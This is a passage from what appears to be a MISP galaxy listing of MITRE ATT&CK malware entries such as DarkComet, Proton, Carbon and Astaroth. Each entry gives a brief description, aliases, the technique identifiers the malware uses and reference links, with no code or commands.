uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 5011. Table References
Links
https://attack.mitre.org/software/S0277
https://objective-see.com/blog/blog_0x25.html

ZergHelper - S0287

[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple’s App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)

The tag is: misp-galaxy:mitre-malware="ZergHelper - S0287"

ZergHelper - S0287 is also known as:

ZergHelper

View relationships graph

ZergHelper - S0287 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5012. Table References
Links
https://attack.mitre.org/software/S0287
http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/

iKitten - S0278

[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="iKitten - S0278"

iKitten - S0278 is also known as:

iKitten
OSX/MacDownloader

View relationships graph

iKitten - S0278 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 5013. Table References
Links
https://attack.mitre.org/software/S0278
https://objective-see.com/blog/blog_0x25.html

XcodeGhost - S0297

[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)

The tag is: misp-galaxy:mitre-malware="XcodeGhost - S0297"

XcodeGhost - S0297 is also known as:

XcodeGhost

View relationships graph

XcodeGhost - S0297 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

Table 5014. Table References
Links
https://attack.mitre.org/software/S0297
http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/
http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/

Proton - S0279

[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="Proton - S0279"

Proton - S0279 is also known as:

Proton

View relationships graph

Proton - S0279 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 5015. Table References
Links
https://attack.mitre.org/software/S0279
https://objective-see.com/blog/blog_0x25.html

KeyRaider - S0288

[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-malware="KeyRaider - S0288"

KeyRaider - S0288 is also known as:

KeyRaider

View relationships graph

KeyRaider - S0288 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 5016. Table References
Links
https://attack.mitre.org/software/S0288
http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

NotCompatible - S0299

[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)

The tag is: misp-galaxy:mitre-malware="NotCompatible - S0299"

NotCompatible - S0299 is also known as:

NotCompatible

View relationships graph

NotCompatible - S0299 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploit Enterprise Resources - T1428" with estimative-language:likelihood-probability="almost-certain"

Table 5017. Table References
Links
https://attack.mitre.org/software/S0299
https://blog.lookout.com/blog/2014/11/19/notcompatible/

UBoatRAT - S0333

[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)

The tag is: misp-galaxy:mitre-malware="UBoatRAT - S0333"

UBoatRAT - S0333 is also known as:

UBoatRAT

View relationships graph

UBoatRAT - S0333 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 5018. Table References
Links
https://attack.mitre.org/software/S0333
https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

DarkComet - S0334

[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)

The tag is: misp-galaxy:mitre-malware="DarkComet - S0334"

DarkComet - S0334 is also known as:

DarkComet
DarkKomet
Fynloski
Krademok
FYNLOS

View relationships graph

DarkComet - S0334 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 5019. Table References
Links
https://attack.mitre.org/software/S0334
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/DARKCOMET
https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

Rifdoor - S0433

[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)

The tag is: misp-galaxy:mitre-malware="Rifdoor - S0433"

Rifdoor - S0433 is also known as:

Rifdoor

View relationships graph

Rifdoor - S0433 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5020. Table References
Links
https://attack.mitre.org/software/S0433
https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

SLOTHFULMEDIA - S0533

[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)

In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020)

The tag is: misp-galaxy:mitre-malware="SLOTHFULMEDIA - S0533"

SLOTHFULMEDIA - S0533 is also known as:

SLOTHFULMEDIA
JackOfHearts
QueenOfClubs

View relationships graph

SLOTHFULMEDIA - S0533 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 5021. Table References
Links
https://attack.mitre.org/software/S0533
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a
https://twitter.com/craiu/status/1311920398259367942
https://twitter.com/CNMF_CyberAlert/status/1311743710997159953
https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/
https://twitter.com/ESETresearch/status/1311762215490461696

Carbon - S0335

[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)

The tag is: misp-galaxy:mitre-malware="Carbon - S0335"

Carbon - S0335 is also known as:

Carbon

View relationships graph

Carbon - S0335 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 5022. Table References
Links
https://attack.mitre.org/software/S0335
https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

NOKKI - S0353

[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)

The tag is: misp-galaxy:mitre-malware="NOKKI - S0353"

NOKKI - S0353 is also known as:

NOKKI

View relationships graph

NOKKI - S0353 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 5023. Table References
Links
https://attack.mitre.org/software/S0353
https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/
https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

NanoCore - S0336

[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: misp-galaxy:mitre-malware="NanoCore - S0336"

NanoCore - S0336 is also known as:

NanoCore

View relationships graph

NanoCore - S0336 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 5024. Table References
Links
https://attack.mitre.org/software/S0336
https://www.digitrustgroup.com/nanocore-not-your-average-rat/
https://cofense.com/nanocore-rat-resurfaced-sewers/
https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

Astaroth - S0373

[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019)(Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Astaroth - S0373"

Astaroth - S0373 is also known as:

Astaroth
Guildma

View relationships graph

Astaroth - S0373 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002" with estimative-language:likelihood-probability="almost-certain"
